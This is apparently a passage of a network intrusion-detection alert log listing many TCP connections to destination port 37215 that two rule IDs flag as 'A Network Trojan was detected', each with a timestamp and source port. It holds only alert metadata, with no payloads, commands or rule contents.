          Timestamp:06/09/24-16:33:40.951651
          SID:2835222
          Source Port:53892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417516
          SID:2829579
          Source Port:55982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206891
          SID:2829579
          Source Port:42494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921135
          SID:2835222
          Source Port:38982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289159
          SID:2829579
          Source Port:55850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166790
          SID:2829579
          Source Port:56060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914595
          SID:2829579
          Source Port:51964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567393
          SID:2835222
          Source Port:40060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225975
          SID:2829579
          Source Port:54740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169395
          SID:2829579
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998689
          SID:2835222
          Source Port:51570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082730
          SID:2829579
          Source Port:32930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687475
          SID:2835222
          Source Port:44378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476523
          SID:2829579
          Source Port:41672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987227
          SID:2829579
          Source Port:41450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644976
          SID:2835222
          Source Port:51200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.479670
          SID:2835222
          Source Port:50828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297786
          SID:2835222
          Source Port:39214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395861
          SID:2829579
          Source Port:55220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472040
          SID:2829579
          Source Port:58680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207945
          SID:2829579
          Source Port:58094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539743
          SID:2835222
          Source Port:58846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224998
          SID:2829579
          Source Port:54038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230521
          SID:2835222
          Source Port:35110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592713
          SID:2829579
          Source Port:44292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400399
          SID:2829579
          Source Port:58896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291750
          SID:2829579
          Source Port:56122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418885
          SID:2835222
          Source Port:32812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719175
          SID:2835222
          Source Port:42576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867750
          SID:2829579
          Source Port:42286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.268409
          SID:2835222
          Source Port:54506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476760
          SID:2835222
          Source Port:42720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169780
          SID:2829579
          Source Port:46396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645069
          SID:2829579
          Source Port:37234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033112
          SID:2829579
          Source Port:40034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.671686
          SID:2835222
          Source Port:58106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296503
          SID:2829579
          Source Port:39448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298359
          SID:2835222
          Source Port:58336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161887
          SID:2835222
          Source Port:50764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076993
          SID:2835222
          Source Port:56764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242392
          SID:2829579
          Source Port:49604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038482
          SID:2829579
          Source Port:60256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082659
          SID:2835222
          Source Port:44434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282536
          SID:2835222
          Source Port:59902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411972
          SID:2835222
          Source Port:34940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417911
          SID:2835222
          Source Port:35456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645633
          SID:2829579
          Source Port:53510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713434
          SID:2829579
          Source Port:57586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604676
          SID:2835222
          Source Port:38622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916479
          SID:2835222
          Source Port:46714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417462
          SID:2829579
          Source Port:42542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569454
          SID:2835222
          Source Port:58930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102603
          SID:2829579
          Source Port:45662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870649
          SID:2835222
          Source Port:55346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.270067
          SID:2835222
          Source Port:50910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164638
          SID:2835222
          Source Port:52404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206177
          SID:2835222
          Source Port:45556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603788
          SID:2835222
          Source Port:40278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397637
          SID:2835222
          Source Port:38024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027932
          SID:2835222
          Source Port:54966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719559
          SID:2835222
          Source Port:54404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867805
          SID:2829579
          Source Port:36592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038482
          SID:2829579
          Source Port:35178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693978
          SID:2829579
          Source Port:34346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161386
          SID:2829579
          Source Port:35316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.688067
          SID:2835222
          Source Port:33856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169209
          SID:2835222
          Source Port:53756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012790
          SID:2829579
          Source Port:49012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.560013
          SID:2835222
          Source Port:40330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299799
          SID:2829579
          Source Port:43662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720344
          SID:2835222
          Source Port:38662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297739
          SID:2829579
          Source Port:47482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599509
          SID:2829579
          Source Port:52740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272097
          SID:2829579
          Source Port:34852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034067
          SID:2829579
          Source Port:33990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167667
          SID:2835222
          Source Port:36358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490194
          SID:2835222
          Source Port:56580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642901
          SID:2835222
          Source Port:46546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167616
          SID:2829579
          Source Port:37712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925419
          SID:2829579
          Source Port:44908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168938
          SID:2835222
          Source Port:50616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102163
          SID:2835222
          Source Port:37504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602665
          SID:2829579
          Source Port:40036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914613
          SID:2829579
          Source Port:55060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395842
          SID:2829579
          Source Port:39744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537962
          SID:2835222
          Source Port:56764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281136
          SID:2829579
          Source Port:54516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598242
          SID:2835222
          Source Port:35262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998728
          SID:2829579
          Source Port:52942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274678
          SID:2835222
          Source Port:35306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865182
          SID:2835222
          Source Port:41848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163119
          SID:2835222
          Source Port:59222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206972
          SID:2829579
          Source Port:58498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244837
          SID:2829579
          Source Port:55686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250531
          SID:2835222
          Source Port:38594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821741
          SID:2829579
          Source Port:33790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247171
          SID:2835222
          Source Port:32908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.096015
          SID:2835222
          Source Port:57958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272085
          SID:2829579
          Source Port:37240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560642
          SID:2829579
          Source Port:51890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.952845
          SID:2829579
          Source Port:50872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029842
          SID:2829579
          Source Port:47972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539978
          SID:2829579
          Source Port:52524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035201
          SID:2829579
          Source Port:37300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715519
          SID:2829579
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922986
          SID:2835222
          Source Port:52394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905566
          SID:2829579
          Source Port:35278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224998
          SID:2835222
          Source Port:57812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682192
          SID:2835222
          Source Port:60736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566079
          SID:2835222
          Source Port:39938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.282282
          SID:2829579
          Source Port:42244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644903
          SID:2835222
          Source Port:59862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719015
          SID:2835222
          Source Port:34670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396583
          SID:2835222
          Source Port:39018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719352
          SID:2829579
          Source Port:58720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249576
          SID:2835222
          Source Port:60966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719970
          SID:2829579
          Source Port:54706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.294058
          SID:2835222
          Source Port:59882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468712
          SID:2829579
          Source Port:49412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284844
          SID:2829579
          Source Port:58720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298102
          SID:2829579
          Source Port:43902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867161
          SID:2835222
          Source Port:44672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595584
          SID:2829579
          Source Port:45112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865290
          SID:2835222
          Source Port:35554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540256
          SID:2835222
          Source Port:36856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926988
          SID:2829579
          Source Port:52084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891021
          SID:2835222
          Source Port:39490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819791
          SID:2829579
          Source Port:49822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.083061
          SID:2835222
          Source Port:46882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719813
          SID:2835222
          Source Port:49484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168578
          SID:2829579
          Source Port:51384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602439
          SID:2835222
          Source Port:59630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926057
          SID:2829579
          Source Port:33472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599225
          SID:2835222
          Source Port:33334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165484
          SID:2835222
          Source Port:43440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250533
          SID:2829579
          Source Port:59282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288585
          SID:2829579
          Source Port:46882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034951
          SID:2835222
          Source Port:50470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474521
          SID:2829579
          Source Port:34180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996260
          SID:2829579
          Source Port:34488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592656
          SID:2835222
          Source Port:55516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692986
          SID:2835222
          Source Port:55484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284312
          SID:2829579
          Source Port:44160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645542
          SID:2829579
          Source Port:52194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306415
          SID:2829579
          Source Port:59230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.279012
          SID:2835222
          Source Port:57354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.661595
          SID:2835222
          Source Port:50640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822643
          SID:2835222
          Source Port:56558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.553728
          SID:2829579
          Source Port:51882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245063
          SID:2829579
          Source Port:33130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033088
          SID:2829579
          Source Port:54136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037813
          SID:2829579
          Source Port:56744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079265
          SID:2829579
          Source Port:47994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.956407
          SID:2835222
          Source Port:38526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.952560
          SID:2835222
          Source Port:59832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396592
          SID:2835222
          Source Port:60184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918192
          SID:2829579
          Source Port:51054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082127
          SID:2829579
          Source Port:55316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467124
          SID:2835222
          Source Port:47812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294941
          SID:2835222
          Source Port:45218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561771
          SID:2829579
          Source Port:43560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287838
          SID:2835222
          Source Port:49010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223606
          SID:2835222
          Source Port:50616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029656
          SID:2829579
          Source Port:40158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643966
          SID:2835222
          Source Port:48558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289093
          SID:2835222
          Source Port:36666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164254
          SID:2829579
          Source Port:35234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716640
          SID:2829579
          Source Port:42770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.464740
          SID:2835222
          Source Port:48854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399807
          SID:2829579
          Source Port:36970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163598
          SID:2835222
          Source Port:52084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538686
          SID:2835222
          Source Port:56428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133717
          SID:2835222
          Source Port:40560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035808
          SID:2829579
          Source Port:60628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717807
          SID:2835222
          Source Port:56040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567605
          SID:2829579
          Source Port:47954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923088
          SID:2829579
          Source Port:38376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.085519
          SID:2835222
          Source Port:58864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600462
          SID:2829579
          Source Port:58428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223352
          SID:2835222
          Source Port:50982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103071
          SID:2829579
          Source Port:34316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720630
          SID:2835222
          Source Port:36516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944741
          SID:2829579
          Source Port:47120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289982
          SID:2829579
          Source Port:59322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909177
          SID:2835222
          Source Port:53244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289863
          SID:2835222
          Source Port:43772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714738
          SID:2835222
          Source Port:52412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079534
          SID:2835222
          Source Port:49810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821709
          SID:2829579
          Source Port:55422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168982
          SID:2829579
          Source Port:46064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075598
          SID:2835222
          Source Port:41876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417929
          SID:2835222
          Source Port:43696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414950
          SID:2835222
          Source Port:46940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893095
          SID:2829579
          Source Port:36054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915872
          SID:2835222
          Source Port:54390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272022
          SID:2829579
          Source Port:37420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164885
          SID:2835222
          Source Port:58218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165337
